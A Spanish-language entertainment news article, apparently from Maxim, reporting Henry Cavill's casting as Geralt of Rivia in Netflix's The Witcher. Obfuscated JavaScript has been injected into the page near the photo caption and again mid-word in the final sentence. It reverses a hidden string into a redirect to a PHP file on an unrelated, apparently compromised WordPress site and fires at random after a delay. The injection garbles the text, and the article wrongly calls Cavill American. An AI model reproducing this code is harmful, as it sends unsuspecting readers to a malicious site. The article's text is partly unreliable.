Henry Cavill encabezará el elenco de The Witcher

    Henry Cavill encabezará el elenco de The Witcher

    Cavill interpretará a Geralt de Rivia, el brujo protagonista de esta saga de videojuegos.

    Autor: Redacción Maxim 4 septiembre, 2018


     

    $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to_by_Cheriss_May_-_NurPhoto_via_Getty_Images_120180903-9744-ew7hhw.jpeg» alt=»» width=»1620″ height=»1080″ /> Henry Cavill. Fotografía por Cheriss May/NurPhoto vía Getty Images. Cortesía Netflix.

     

    Henry Cavill encabezará el elenco de The Witcher, tendrá el papel de Geralt de Rivia en la nueva serie de Netflix

     

    A través de un comunicado la marca roja de streaming, dio a conocer que el actor Henry Cavill (Misión Imposible – Fallout, Justice League) protagonizará The Witcher, serie basada en el videojuego homónimo y las novelas La saga del brujo, del escritor polaco Andrzej Sapkowski.

     

     

    via GIPHY

     

     

    Los  primeros ocho episodios de The Witcher tendrán como directores a Alik Sakharov (Perros de paja), Charlotte Brändström (Johan Falk: Codename: Lisa)  y Alex Garcia Lopez [ Daredevil (Netflix)].

     

     

     

     

    El papel que interpretará Cavill será el de Geralt de Rivia, el brujo protagonista de esta saga, quien además es un cazador de monstruos a sueldo y un estupendo espadachín. Este lucha por encontrar su lugar en un mundo en el que de personas  perversas y aventuras inesperadas.

     

     

     

     

    Cavill, quien protagonizó éxito taquillero Misión Imposible – Fallout, que hasta ahora ha recaudado más de 649 millones  de dólares al rededor el mundo. Es un fanático declarado de los cuentos cortos y novelas escritos por Andrzej Sapkowski. Por esta razón, esta papel tiene un significado especial para el actor estadounidense.

     

    via GIPHY

     

     

    Tendremos que esperar a 2019 para ver al otrora «Hombre de acero», blandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andir la espada de Geralt de Rivia.

     

     

     

     

     

    Temas relacionados con esta nota: , , , , ,

Cavill interpretará a Geralt de Rivia, el brujo protagonista de esta saga de videojuegos.